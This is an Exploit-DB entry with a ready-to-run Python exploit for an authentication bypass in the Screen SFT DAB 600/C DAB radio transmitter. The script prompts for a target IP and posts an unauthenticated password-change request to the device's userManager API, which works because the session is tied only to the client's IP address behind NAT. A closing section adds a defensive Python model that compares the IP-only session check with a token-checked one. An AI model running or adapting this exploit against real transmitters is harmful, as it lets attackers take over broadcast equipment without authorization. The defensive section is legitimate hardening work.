Screen SFT DAB 600/C – Authentication Bypass Password Change

  • Author: LiquidWorm
    Date: 2023-05-23
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51456/
#!/usr/bin/env python3
#
# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Password Change
# Exploit Author: LiquidWorm
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
#                   Bios firmware: 7.1 (Apr 19 2021)
#                   Gui: 2.46
#                   FPGA: 169.55
#                   uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuration flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: The application suffers from weak session management that can
# allow an attacker on the same network to bypass these controls by reusing
# the same IP address assigned to the victim user (NAT) and exploit crucial
# operations on the device itself. By abusing the IP address property that
# is bound to the Session ID, one needs to wait for such an established
# session and issue unauthorized requests to the vulnerable API to manage
# and/or manipulate the affected transmitter.
#
# Tested on: Keil-EWEB/2.1
#            MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2023-5772
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5772.php
#
#
# 19.03.2023
#

import hashlib,datetime##########
import requests,colorama#########
from colorama import Fore, Style#
colorama.init()
print(Fore.RED+Style.BRIGHT+
'''
█████████████ ██████ ██ █████ █████████████ ██████
██ ██ ██████████ ██ ████ ██ ██ ██ ████ ██ 
███████████ ██ ████ ██ ██ ██ ████ ██ ██ █████ ██████
██ ██ ████████ ██ ████ ██ ██ ██ ████ ██ 
██ ██ ███████ ████ ██ ██ ████ █████████████ ██ ██ 
'''
+Style.RESET_ALL)
print(Fore.WHITE+Style.BRIGHT+
'''
ZSL and the Producers insist that no one
 submit any exploits of themselfs or others
performing any dangerous activities.
 We will not open or view them.
'''
+Style.RESET_ALL)
s=datetime.datetime.now()
s=s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -',s)
t=input('Enter transmitter ip: ')
u=input('Enter desired username: ')
p=input('Enter desired password: ')
e='/system/api/userManager.cgx'
# The API expects the new password as its MD5 hex digest, not in clear.
m5=hashlib.md5()
m5.update(p.encode('utf-8'))
h=m5.hexdigest()
print('Your sig:',h)
print('Calling object: ssbtObj')
print('CGX fastcall: userManager::changeUserPswd')
t='http://'+t+e
bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
    'Accept':'application/json, text/plain, */*',
    'Accept-Language':'ku-MK,en;q=0.9',
    'Accept-Encoding':'gzip, deflate',
    'User-Agent':'Dabber+',
    'Connection':'close'}
# No session cookie is sent: the device accepts the call on the strength of
# the client IP alone, which is the weakness described above.
j={'ssbtIdx':0,
   'ssbtType':'userManager',
   'ssbtObj':{
     'changeUserPswd':{
       'username':u,
       'password':h
     }
   },
}
r=requests.post(t,headers=bh,json=j)
if r.status_code==200:
    print('Done.')
else:
    print('Error')
    exit(-4)
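The session weakness the advisory describes, modelled as an added example for defenders (it is not the vendor's firmware code nor the exploit author's): a gate that trusts the client address alone is placed beside one that also demands an unguessable bearer token, so a second host behind the same NAT address can no longer piggy-back on the victim's login. `SessionStore`, `authorize_ip_only`, `authorize_token` and the addresses are assumptions made for the demonstration.

```python
# Added example: minimal model of the session gate from the advisory above,
# not the vendor's firmware or the exploit author's code. Names and
# addresses are assumptions made for the demonstration.
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional

@dataclass
class Session:
    ip: str
    token: str

@dataclass
class SessionStore:
    by_ip: Dict[str, Session] = field(default_factory=dict)  # ip -> Session

    def login(self, ip: str) -> Session:
        # 256-bit token from the OS CSPRNG, handed back as an HttpOnly
        # cookie; it is never derived from the client address.
        sess = Session(ip=ip, token=secrets.token_hex(32))
        self.by_ip[ip] = sess
        return sess

    def authorize_ip_only(self, ip: str) -> bool:
        """Weak gate (the advisory's case): any request from an address
        that has a live session is accepted, cookie or not."""
        return ip in self.by_ip

    def authorize_token(self, ip: str, token: Optional[str]) -> bool:
        """Hardened gate: the request must carry the session token, so a
        second host behind the same NAT address cannot piggy-back."""
        sess = self.by_ip.get(ip)
        if sess is None or token is None:
            return False
        # Constant-time comparison; never use == on a secret.
        return secrets.compare_digest(sess.token, token)

def demo():
    """Victim logs in from a NAT address; a request from the same address
    without the cookie passes the weak gate and fails the hardened one."""
    store = SessionStore()
    victim = store.login("203.0.113.10")  # constructed address (RFC 5737)
    return (
        store.authorize_ip_only("203.0.113.10"),              # True
        store.authorize_token("203.0.113.10", None),          # False
        store.authorize_token("203.0.113.10", "0" * 64),      # False
        store.authorize_token("203.0.113.10", victim.token),  # True
    )
```

A real handler for `changeUserPswd` would additionally check that the authenticated session holds the privilege to change the named user's password, which the token check alone does not decide.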